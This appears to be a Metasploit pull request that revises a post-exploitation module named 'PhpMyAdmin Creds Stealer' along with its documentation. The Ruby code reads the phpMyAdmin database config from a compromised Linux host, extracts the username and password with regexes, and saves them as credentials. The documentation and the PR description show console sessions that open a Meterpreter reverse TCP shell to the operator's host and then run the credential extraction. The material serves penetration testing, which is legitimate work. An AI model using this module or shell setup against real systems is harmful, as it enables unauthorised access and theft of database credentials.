### PR TITLE
Store Credentials Found with PhpMyAdmin Password Extractor

### DIFF
--- a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
+++ b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
@@ -41,6 +41,7 @@ PhpMyAdmin Creds Stealer!
 [+] User: admin
 [+] Password: acoolpassword
 [*] Storing credentials...
+[+] Config file located at /Users/space/.msf4/loot/20180907081056_default_192.168.37.226_phpmyadmin_conf_580315.txt
 [*] Post module execution completed
 msf5 post(linux/gather/phpmyadmin_credsteal) > 
 

--- a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
+++ b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
@@ -15,36 +15,33 @@ This post module gathers PhpMyAdmin Creds from target Linux machine.
 ## Scenarios
 
 ```
-msf exploit(multi/handler) > [*] Sending stage (857352 bytes) to 127.0.0.1
-[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:46066) at 2018-08-18 14:46:52 -0400
+msf5 post(linux/gather/phpmyadmin_credsteal) > use multi/handler
+msf5 exploit(multi/handler) > set lhost 192.168.37.1
+lhost => 192.168.37.1
+msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
+payload => linux/x64/meterpreter/reverse_tcp
+msf5 exploit(multi/handler) > run
 
-msf exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal
-msf post(linux/gather/phpmyadmin_credsteal) > set SESSION 1
-SESSION => 1
-msf post(linux/gather/phpmyadmin_credsteal) > exploit
+[*] Started reverse TCP handler on 192.168.37.1:4444 
+[*] Sending stage (816260 bytes) to 192.168.37.226
+[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.226:34880) at 2018-09-06 08:49:52 -0500
+
+meterpreter > background
+[*] Backgrounding session 2...
+msf5 exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal 
+msf5 post(linux/gather/phpmyadmin_credsteal) > set session 2
+session => 2
+msf5 post(linux/gather/phpmyadmin_credsteal) > run
+
+
+PhpMyAdmin Creds Stealer!
 
 [+] PhpMyAdmin config found!
-[+] Extracting config file!
-
-<?php
-##
-## database access settings in php format
-## automatically generated from /etc/dbconfig-common/phpmyadmin.conf
-## by /usr/sbin/dbconfig-generate-include
-##
-## by default this file is managed via ucf, so you shouldn't have to
-## worry about manual changes being silently discarded.  *however*,
-## you'll probably also want to edit the configuration file mentioned
-## above too.
-##
-$dbuser='phpmyadmin';
-$dbpass='Passw0rd';
-$basepath='';
-$dbname='phpmyadmin';
-$dbserver='localhost';
-$dbport='3306';
-$dbtype='mysql';
-
+[+] Extracting creds
+[+] User: admin
+[+] Password: acoolpassword
+[*] Storing credentials...
 [*] Post module execution completed
-msf post(linux/gather/phpmyadmin_credsteal) >
+msf5 post(linux/gather/phpmyadmin_credsteal) > 
+
 ```

--- a/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
+++ b/documentation/modules/post/linux/gather/phpmyadmin_credsteal.md
@@ -15,7 +15,7 @@ This post module gathers PhpMyAdmin Creds from target Linux machine.
 ## Scenarios
 
 ```
-msf5 post(linux/gather/phpmyadmin_credsteal) > use multi/handler
+msf5 > use multi/handler
 msf5 exploit(multi/handler) > set lhost 192.168.37.1
 lhost => 192.168.37.1
 msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp

--- a/modules/post/linux/gather/phpmyadmin_credsteal.rb
+++ b/modules/post/linux/gather/phpmyadmin_credsteal.rb
@@ -26,16 +26,14 @@ class MetasploitModule < Msf::Post
    end
 
   def parse_creds(contents)
-    db_user = /\$dbuser=['"](.*)['"];/.match(contents)
-    db_pass = /\$dbpass=['"](.*)['"];/.match(contents)
+    db_user = contents.scan(/\$dbuser\s*=\s*['"](.*)['"];/).flatten.first
+    db_pass = contents.scan(/\$dbpass\s*=\s*['"](.*)['"];/).flatten.first
 
     unless db_user && db_pass
       print_error("Couldn't find PhpMyAdmin credentials")
       return
     end
 
-    db_user = db_user[1]
-    db_pass = db_pass[1]
     print_good("User: #{db_user}")
     print_good("Password: #{db_pass}")
 

--- a/modules/post/linux/gather/phpmyadmin_credsteal.rb
+++ b/modules/post/linux/gather/phpmyadmin_credsteal.rb
@@ -25,32 +25,46 @@ class MetasploitModule < Msf::Post
     ))
    end
 
-  def run
+  def parse_creds(contents)
+    db_user = /\$dbuser=\'(.*)\';/.match(contents)
+    db_pass = /\$dbpass=\'(.*)\';/.match(contents)
 
+    unless db_user && db_pass
+      print_error("Couldn't find PhpMyAdmin credentials")
+      return
+    end
+
+    db_user = db_user[1]
+    db_pass = db_pass[1]
+    print_good("User: #{db_user}")
+    print_good("Password: #{db_pass}")
+
+    print_status("Storing credentials...")
+    store_valid_credential(user: db_user, private: db_pass)
+  end
+
+  def run
     print_line("\nPhpMyAdmin Creds Stealer!\n")
-    cred_dump = ""
 
     if session.platform.include?("windows")
       print_error("This module is not compatible with windows")
       return
     end
 
-    conf_path= "/etc/phpmyadmin/config-db.php"
+    conf_path = "/etc/phpmyadmin/config-db.php"
     unless file_exist?(conf_path)
       print_error("#{conf_path} doesn't exist on target")
       return
     end
 
     print_good('PhpMyAdmin config found!')
-    print_good("Extracting Creds")
     res = read_file(conf_path)
     unless res
       print_error("You may not have permissions to read the file.")
       return
     end
 
-    cred_dump << res
-    p = store_loot('phpmyadmin_conf', 'text/plain', session, cred_dump, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')
-    print_good("Credentials saved in #{p}")
+    print_good("Extracting creds")
+    parse_creds(res)
   end
 end

--- a/modules/post/linux/gather/phpmyadmin_credsteal.rb
+++ b/modules/post/linux/gather/phpmyadmin_credsteal.rb
@@ -26,8 +26,8 @@ class MetasploitModule < Msf::Post
    end
 
   def parse_creds(contents)
-    db_user = /\$dbuser=\'(.*)\';/.match(contents)
-    db_pass = /\$dbpass=\'(.*)\';/.match(contents)
+    db_user = /\$dbuser=['"](.*)['"];/.match(contents)
+    db_pass = /\$dbpass=['"](.*)['"];/.match(contents)
 
     unless db_user && db_pass
       print_error("Couldn't find PhpMyAdmin credentials")
@@ -66,5 +66,8 @@ class MetasploitModule < Msf::Post
 
     print_good("Extracting creds")
     parse_creds(res)
+
+    p = store_loot('phpmyadmin_conf', 'text/plain', session, res, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')
+    print_good("Config file located at #{p}")
   end
 end


### PR DESCRIPTION
This stores the credentials obtained with the PhpMyAdmin Password Extractor post module. Prior to this change, the config file containing the credentials would be stored locally after successful execution of the module. #10484 

## Verification

- [x] Start `msfconsole`
- [x] Get a session
- [x] `use post/linux/gather/phpmyadmin_credsteal`
- [x] `set session <session>`
- [x] `run`
- [x] You should get output containing the PhpMyAdmin credentials

## Scenarios

```

msf5 > use multi/handler
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (816260 bytes) to 192.168.37.226
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.226:34880) at 2018-09-06 08:49:52 -0500

meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(multi/handler) > use post/linux/gather/phpmyadmin_credsteal 
msf5 post(linux/gather/phpmyadmin_credsteal) > set session 2
session => 2
msf5 post(linux/gather/phpmyadmin_credsteal) > run


PhpMyAdmin Creds Stealer!

[+] PhpMyAdmin config found!
[+] Extracting creds
[+] User: admin
[+] Password: acoolpassword
[*] Storing credentials...
[*] Post module execution completed
msf5 post(linux/gather/phpmyadmin_credsteal) > 

```

